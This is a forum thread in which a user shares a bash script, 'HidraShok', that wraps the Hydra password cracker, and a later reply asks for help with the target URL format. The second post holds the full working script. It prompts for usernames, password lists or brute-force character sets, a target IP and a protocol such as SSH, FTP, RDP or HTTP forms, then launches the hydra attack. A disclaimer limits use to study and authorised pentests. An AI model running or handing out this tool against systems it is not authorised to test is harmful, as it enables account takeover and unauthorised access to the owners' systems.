Results 1 to 3 of 3

Thread: Hydra bruteforce and dictonary attack script.

Hybrid View

  1. #1
    Member
    Join Date
    Jan 2010
    Posts
    54

    Default Hydra bruteforce and dictonary attack script.

    This is my first script - HidraShok

    It is a script to make password attacks alot easier for people. It can do either bruteforcing or dictonairy attacks.

    I spent all morning learning how to code this and i wanted to share it with everyone, I couldnt find a section in the forums for scripts but i noticed there was alot of script in this section so i chose to post here (please move if it the wrong section).

    version 0.1
    • It can do a dictonary attack
    • It can bruteforce
    • It can use a single username or a list of usernames
    • You can choose how many tasks to run simultanouisly
    • You can choose the timeout time
    • You can choose the wabpage to attack


    version 0.2
    • Fixed a problem in the if statment that executed the final command to run hydra. It was stoping the script working if you had picked password option 1 or 2.
    • New issue when choosing the option to use text files the script turns the ' into / so it messes up the script. looking for a fix, does anyone know one?




    Things i want to do
    • Add in error detection incase user enters wrong info
    • More options to define the attack
    Last edited by deviney; 06-17-2012 at 03:21 AM.

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    54

    Default Re: Hydra bruteforce and dictonary attack script.

    Let me know what you think and how it could be improved


    Code:
    #!/bin/bash
    # PLEASE READ AND STUDY BEFORE LAUNCHING
    
    # --------------------------------------------------------------------------------------------------------------------#
    # v0.2 17.06.2012
    #
    # Copyright (C) 2012  Deviney
    
    # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public 
    # License as published by the Free Software Foundation; either version 2 of the License, or any later version.
    # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied 
    # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
    # You should have received a copy of the GNU General Public License along with this program; if not, write to the
    # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
    # --------------------------------------------------------------------------------------------------------------------#
    
    # Disclaimer:   This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
    #               I sincerely hope skiddies find it overwhelming. (not very likely tho)
    
    
    #  ===========================================================================================  #
    # 				  "...On The Shoulders Of Giants..."                                            #
    #  =================
    ==========================================================================  #
    
    # 		Large chunks copied directly from VulpiArgenti's PwnSTAR script                            #
    #										                                                        #
    #		I only used parts that made the script look user frendly the code
    #		that does the the work is my own or has been edited to do a diffrent job.
    
    #  ===========================================================================================  #
    
    # Thanks to VulpiArgenti i used his code as a learning base
    
    
    
    # ~~~~~~~~~~  Environment Setup ~~~~~~~~~~ #
    # Text color variables - saves retyping these awful ANSI codes
    
    txtrst="\e[0m"      # Text reset
    
    def="\e[1;34m"	    # default 		   blue
    warn="\e[1;31m"     # warning		   red
    info="\e[1;34m" 	# info             blue
    q="\e[1;32m"		# questions        green
    inp="\e[1;36m"	    # input variables  magenta
    
    ### 7 characters = 120 pixels?
    var=$(ls /etc | grep kde4)          # detect KDE
    if [[ -z $var ]];then
        resize -s 38 85 &> /dev/null    # resize the terminal if gnome, not KDE
    fi
    
    echo -e "\e[0;40m"      # background black
    clear
    
    # ~~~~~~~~~~ Intro ~~~~~~~~~~ #
    
    banner_fn()
    {
    	echo -e "\e[1;37m 
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Deviney~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                              
                      
                                                                                                                      
        *                    **                                  *******      *                    *           
      **          *           **                               *       ***  **                   **            
      **         ***          **                              *         **  **                   **            
      **          *           **                              **        *   **                   **            
      **                      **   ***  ****                   ***          **           ****    **            
      **  ***   ***       *** **    **** **** *    ****       ** ***        **  ***     * ***  * **  ***       
      ** * ***   ***     *********   **   ****    * ***  *     *** ***      ** * ***   *   ****  ** * ***      
      ***   ***   **    **   ****    **          *   ****        *** ***    ***   *** **    **   ***   *       
      **     **   **    **    **     **         **    **           *** ***  **     ** **    **   **   *        
      **     **   **    **    **     **         **    **             ** *** **     ** **    **   **  *         
      **     **   **    **    **     **         **    **              ** ** **     ** **    **   ** **         
      **     **   **    **    **     **         **    **               * *  **     ** **    **   ******        
      **     **   **    **    **     ***        **    **     ***        *   **     **  ******    **  ***       
      **     **   *** *  *****        ***        ***** **   *  *********    **     **   ****     **   *** *    
       **    **    ***    ***                     ***   ** *     *****       **    **             **   ***     
           *                                             *                       *                           
          *                                               **                    *                            
         *                                                                     *                             
        *                                                                     *                             
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Hydro_Password_Hack_Script_V_0.2~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    
    "
    }
    
    username_options_fn()
    {	
    sleep 2
    	# Trap Ctrl-C
    	trap exit_fn INT 
    	
        username_options=
        echo -e "$info Press ctrl-C at any time to exit neatly\n"
        sleep 1
    	echo -e "$q Are we using a a single username or a username list? (list has to be text file)"
        sleep 0.5
        echo -e "$def
    	
        1) A single username
    
    	
        2) A username list (text file)
    
        
        q) Exit from the script
    	
    	"
    
    read username_options
    	if [[ $username_options = q ]];then
    		exit_fn
        elif [[ $username_options = 1 ]];then
            sin_user_fn
        else
    	list_user_fn
        fi
        
    }
    
    sin_user_fn()
    {
    clear
    banner_fn
    usernamesign=
    : ${usernamesign:="-l "}
    echo -e "$q What is the username we will be using?"
    read username
    password_options_fn
    }
    
    list_user_fn()
    {
    clear
    banner_fn
    usernamesign= 
    : ${usernamesign:="-L "}
    echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
    read username
    password_options_fn
    }
    
    password_options_fn()
    {
    clear
    banner_fn
        password_options=
    	echo -e "$q Are we using a a single password or a password list? (list has to be text file)"
        sleep 0.5
        echo -e "$def
    	
        1) A single password
    
    	
        2) A password list (text file)
    
    
        3) A Bruteforce attack
        
        q) Exit from the script
    	
    	"
        read password_options
        if [[ $password_options = q ]];then
    		exit_fn
        elif [[ $password_options = 1 ]];then
            sin_password_fn
        elif [[ $password_options = 2 ]];then
    	list_password_fn
        else
    	bruteforce_password_fn
        fi
        
    }
    
    sin_password_fn()
    {
    clear
    banner_fn
    passwordsign= 
    : ${passwordsign:="-p "}
    echo -e "$q What is the password we will be using?"
    read password
    Task_fn
    }
    
    list_password_fn()
    {
    clear
    banner_fn
    passwordsign= 
    : ${passwordsign:="-P "}
    echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
    read password
    Task_fn
    }
    
    bruteforce_password_fn()
    {
    clear
    banner_fn
    brute_min=
    brute_max=
    brute_char= 
    : ${passwordsign:="-x"}
    : ${passwordsignbreak:=":"}
    echo -e "$q What is the min amount of charchters in the password?"
    read brute_min
    echo -e "$q What is the max amount of charchters in the password?"
    read brute_max
    echo -e "$q What charcters will be bruteforced? (do not use any space's E.G 'abcdefghi.@123'"
    read brute_char
    Task_fn
    }
    
    Task_fn()
    {
    clear
    banner_fn
    task=
    echo -e "$q How many parallel connections would you like? (suggest 1-32)"
    read task
    timeout_fn
    }
    
    timeout_fn()
    {
    clear
    banner_fn
    timeout=
    echo -e "$q How long would you like a connection to wait before being classed as timed out? (suggest 5-30)"
    read timeout
    ip_address_fn
    }
    
    ip_address_fn()
    {
    clear
    banner_fn
    ip=
    echo -e "$q What is the ip of the target?"
    read ip
    protcol_fn
    }
    
    protcol_fn()
    {
    clear
    banner_fn
    protcol=
    echo -e " $q What protcol will you be using?? (Enter 'show' to see the protcols available)"
    read protcol
    if [[ $protcol = show ]];then
    show_protcols_fn
    else
    webpage_fn
    fi
    }
    
    show_protcols_fn()
    {
    clear
    banner_fn
    echo -e "AFP,			Cisco AAA,		 Cisco auth,	 	Cisco enable"
    echo -e "CVS,	 		Firebird,		 FTP, 			HTTP-FORM-GET"
    echo -e "HTTP-FORM-POST, 	HTTP-GET,		 HTTP-HEAD, 		HTTP-PROXY"
    echo -e "HTTPS-FORM-GET,	HTTPS-FORM-POST,	 HTTPS-GET, 		HTTPS-HEAD"
    echo -e "HTTP-Proxy, 		ICQ,     		 IMAP, 			IRC"
    echo -e "LDAP, 			MS-SQL,			 MYSQL, 		NCP"
    echo -e "NNTP, 			Oracle Listener,	 Oracle, 		Oracle SID"
    echo -e "PC-Anywhere, 		PCNFS,			 POP3, 			POSTGRES"
    echo -e "RDP, 			Rexec, 			 Rlogin, 		Rsh"
    echo -e "SAP/R3, 		SIP, 			 SMB, 			SMTP"
    echo -e "SMTP Enum, 		SNMP,			 SOCKS5, 		SSH (v1 and v2)"
    echo -e "Subversion, 		Teamspeak (TS2),	 Telnet, 		VMware-Auth"
    echo -e "VNC,			XMPP"
    echo -e ""
    echo -e "Press enter to return back to the prevouise question"
    read
    protcol_fn
    }
    
    webpage_fn()
    {
    clear
    banner_fn
    webpage=
    echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a backslash '/'"
    read webpage
    execute_fn
    }
    
    execute_fn()
    {
    clear
    banner_fn
     if [[ $password_options = [1-2] ]];then
    	echo -e "$warn hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
    	hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage
        elif [[ $password_options = 3 ]];then
            echo -e "$warn hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
    	hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage
    fi
    }
    
    exit_fn()
    {
    clear
    exit 0
    }
    
    # ~~~~~~~~~~ Main Script 2 lines!!! ~~~~~~~~~~ #
    
    banner_fn
    username_options_fn
    Last edited by deviney; 06-17-2012 at 02:32 AM.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2012
    Posts
    1

    Default Re: Hydra bruteforce and dictonary attack script.

    Possible update:

    {
    clear
    banner_fn
    webpage=
    echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a backslash '/'"
    read webpage
    execute_fn
    }


    This is giving me the biggest headache in the world. Can you clarify with an example entry of what a user needs to write?

    For example is it: "FTP://172.16.3.165/"

Similar Threads

  1. HYDRA Bruteforce attack
    By ghostdog67 in forum Tutorial ed HowTo
    Replies: 15
    Last Post: 03-22-2011, 09:31 AM
  2. Replies: 1
    Last Post: 01-10-2011, 11:21 AM
  3. POssible for Hydra ( java script inside )?
    By Benny in forum Experts Forum
    Replies: 3
    Last Post: 03-13-2010, 11:06 PM
  4. Using hydra to bruteforce a router with cgi-bin/[xy] authentication
    By RaginRob in forum OLD BackTrack3 Howtos
    Replies: 14
    Last Post: 05-24-2009, 12:22 PM
  5. Bruteforce attack useless
    By LordIfrit in forum OLD Wireless
    Replies: 55
    Last Post: 12-10-2008, 03:27 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •